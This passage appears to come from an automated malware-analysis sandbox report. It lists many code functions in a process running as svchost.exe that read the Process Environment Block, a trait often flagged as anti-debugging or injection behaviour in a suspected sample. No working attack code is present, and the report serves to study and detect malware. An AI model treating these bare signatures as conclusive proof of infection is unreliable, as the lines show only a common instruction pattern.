            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]2_2_03BEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]2_2_03BEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]2_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]2_2_03C04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]2_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]2_2_03B28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]2_2_03BDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]2_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]2_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]2_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
